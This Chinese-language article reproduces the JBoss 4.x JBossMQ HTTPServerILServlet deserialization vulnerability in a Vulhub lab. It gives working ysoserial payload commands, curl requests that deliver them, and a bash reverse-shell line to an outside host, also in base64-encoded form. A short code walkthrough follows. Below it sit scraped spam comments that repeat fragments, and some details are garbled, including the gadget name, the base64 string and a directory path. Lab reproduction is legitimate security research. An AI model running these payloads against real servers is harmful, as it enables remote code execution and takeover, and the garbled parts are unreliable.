JBoss 4.x JBossMQ JMS反序列化
JBoss 4.x JBossMQ JMS反序列化
影响范围JBoss AS <=4.x漏洞概述在JBoss AS 4.x及之前版本的JbossMQ实现过程中,JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可构造序列化数据利用该漏洞来执行任意代码并获取服务器端的权限环境搭建在这里我们使用Vulhu
JBoss 4.x JBossMQ JMS反序列化
影响范围
JBoss AS <=4.x
漏洞概述
在JBoss AS 4.x及之前版本的JbossMQ实现过程中,JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可构造序列化数据利用该漏洞来执行任意代码并获取服务器端的权限
环境搭建
在这里我们使用Vulhub来构建环境:
代码语言:javascript代码运行次数:0运行复制docker compose up -d
环境启动后访问地址为:
代码语言:javascript代码运行次数:0运行复制http://your-ip:8080
命令执行
漏洞存在该路径下/jbossmq-httpil/HTTPServerILServlet
Step 1:创建文件
利用在线载荷生成工具生成载荷:
代码语言:javascript代码运行次数:0运行复制#构造载荷
java -jar ysoserial.jar CommCollecti5 'touch /tmp/success.sh' > 2.ser
#执行载荷
curl http://192.168.204.17:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @2.ser --output
反弹Shell
随后使用ysoserial.jar工具进行利用:
Step 1:首先生成要反弹shell的载荷(注意这里的输入输出重定向方向哦"<&1",即将输入输出全部重定向到远程主机,反向shell)
代码语言:javascript代码运行次数:0运行复制/bin/bash -i >& /dev/tcp/192.168.204.144/4444<&1
bash -c {echo,L2Jpbi9iYXoIC1pID4mIC9kZXYvdGwLzE5Mi4xjguMjA0LjE0C80DQ0PCYx}|{base64,-d}|{bash,-i}
Step 2:使用ysoserial生成反序列化载荷
代码语言:javascript代码运行次数:0运行复制java -jar ysoserial.jar CommCollecti5 "bash -c {echo,L2Jpbi9iYXoIC1pID4mIC9kZXYvdGwLzE5Mi4xjguMjA0LjE0C80DQ0PCYx}|{base64,-d}|{bash,-i}" > 1.ser
Step :使用CURL发送请求并成功收到反弹的shell
代码语言:javascript代码运行次数:0运行复制curl http://192.168.204.17:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser --output
漏洞分析
从docker中提取整个Jboss文件到本地:
代码语言:javascript代码运行次数:0运行复制docker cp 4f5a65ca980:/opt/jboss /home/jboss
压缩文件夹
代码语言:javascript代码运行次数:0运行复制zip -r jboss.zip jboss
随后解压后使用IDEA打开
紧接着我们来到server/default/deploy/jms/jbossmq-httpil.sar/jbossmq-httpil.war/WEB-IF/web.xml
随后跟进到类org.il.http.servlet.HTTPServerILServlet,此时如果是POST传递的话,会触发processRequest方法
随后可以看到这里会进行一次反序列化操作,存在反序列化漏洞:
代码语言:javascript代码运行次数:0运行复制/jbossmq-httpil/HTTPServerILServlet/*
参考链接
本文参与 腾讯云自媒体同步曝光计划,分享自。原始发表:2025-01-21,如有侵权请联系 cloudcommunity@tencent 删除jbossjms漏洞序列化重定向#感谢您对电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格的认可,转载请说明来源于"电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格
上传时间: 2025-07-19 07:29:50
推荐阅读
留言与评论(共有 14 条评论) |
本站网友 济宁房产 | 2分钟前 发表 |
/opt/jboss /home/jboss压缩文件夹代码语言:javascript代码运行次数:0运行复制zip -r jboss.zip jboss随后解压后使用IDEA打开紧接着我们来到server/default/deploy/jms/jbossmq-httpil.sar/jbossmq-httpil.war/WEB-IF/web.xml随后跟进到类org.il.http.servlet.HTTPServerILServlet | |
本站网友 跌打损伤 | 21分钟前 发表 |
远程攻击者可构造序列化数据利用该漏洞来执行任意代码并获取服务器端的权限环境搭建在这里我们使用Vulhub来构建环境:代码语言:javascript代码运行次数:0运行复制docker compose up -d环境启动后访问地址为:代码语言:javascript代码运行次数:0运行复制http | |
本站网友 赵晋 | 8分钟前 发表 |
-i}Step 2:使用ysoserial生成反序列化载荷代码语言:javascript代码运行次数:0运行复制java -jar ysoserial.jar CommCollecti5 "bash -c {echo | |
本站网友 鸽子蛋的营养成分 | 22分钟前 发表 |
即将输入输出全部重定向到远程主机 | |
本站网友 七彩云天 | 17分钟前 发表 |
L2Jpbi9iYXoIC1pID4mIC9kZXYvdGwLzE5Mi4xjguMjA0LjE0C80DQ0PCYx}|{base64 | |
本站网友 为什么视频打不开 | 15分钟前 发表 |
分享自 | |
本站网友 农夫山泉有点咸 | 10分钟前 发表 |
//your-ip | |
本站网友 刘汉案 | 19分钟前 发表 |
反向shell)代码语言:javascript代码运行次数:0运行复制/bin/bash -i >& /dev/tcp/192.168.204.144/4444<&1代码语言:javascript代码运行次数:0运行复制bash -c {echo | |
本站网友 刘春 | 6分钟前 发表 |
-d}|{bash | |
本站网友 北京小客车摇号结果查询 | 11分钟前 发表 |
JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞 | |
本站网友 chinaren | 30分钟前 发表 |
原始发表:2025-01-21 | |
本站网友 欧瑞强 | 14分钟前 发表 |
存在反序列化漏洞:代码语言:javascript代码运行次数:0运行复制/jbossmq-httpil/HTTPServerILServlet/*参考链接本文参与 腾讯云自媒体同步曝光计划 | |
本站网友 建邦集团 | 25分钟前 发表 |
即将输入输出全部重定向到远程主机 |